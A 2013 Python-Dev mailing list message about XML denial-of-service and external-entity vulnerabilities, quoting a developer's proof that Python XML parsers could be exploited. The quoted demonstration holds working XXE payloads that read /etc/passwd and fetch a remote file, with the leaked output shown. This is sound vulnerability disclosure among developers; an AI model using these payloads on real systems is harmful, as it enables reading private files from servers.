[Python-Dev] XML DoS vulnerabilities and exploits in Python
M.-A. Lemburg
mal at egenix.com
Sun Feb 24 12:56:33 CET 2013
Reminds me of the encoding attacks that were possible in earlier
versions of Python... you could have e.g. an email processing
script run the Python test suite by simply sending a specially
crafted email :-)
On 21.02.2013 13:04, Christian Heimes wrote:
> Am 21.02.2013 11:32, schrieb Antoine Pitrou:
>> You haven't proved that these were actual threats, nor how they
>> actually worked. I'm gonna remain skeptical if there isn't anything
>> more precise than "It highly depends on the parser and the application
>> what kind of exploit is possible".
>
> https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default
>
> $ ./python-external.py
>
> REQUEST:
> --------
> <weather>Aachen</weather>
>
> RESPONSE:
> ---------
> <weather>The weather in Aachen is terrible.</weather
>
>
> REQUEST:
> --------
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE weather [
> <!ENTITY passwd SYSTEM "file:///etc/passwd">
> ]>
> <weather>&passwd;</weather>
>
>
> RESPONSE:
> ---------
> <error>Unknown city root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bi</error>
>
>
> REQUEST:
> --------
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE weather [
> <!ENTITY url SYSTEM
> "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem">
> ]>
> <weather>&url;</weather>
>
>
> RESPONSE:
> ---------
> <error>Unknown city -----BEGIN DH PARAMETERS-----
> MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
> XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
> -----END DH PARAMETERS-----
>
> These are the 512 bit DH parameters from "Assigned Number for SKIP
> Protocols"
> (http://www.skip-vpn.org/spec/numbers.html).
> See there for how they were generated.
> Note that g is not a generator, but this is not a problem since p is a
> safe prime.
> </error>
>
>
> Q.E.D.
> Christian
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> http://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: http://mail.python.org/mailman/options/python-dev/mal%40egenix.com
>
--
Marc-Andre Lemburg
eGenix.com
Professional Python Services directly from the Source (#1, Feb 24 2013)
>>> Python Projects, Consulting and Support ... http://www.egenix.com/
>>> mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/
>>> mxODBC, mxDateTime, mxTextTools ... http://python.egenix.com/
________________________________________________________________________
::::: Try our mxODBC.Connect Python Database Interface for free ! ::::::
eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
Registered at Amtsgericht Duesseldorf: HRB 46611
http://www.egenix.com/company/contact/
More information about the Python-Dev
mailing list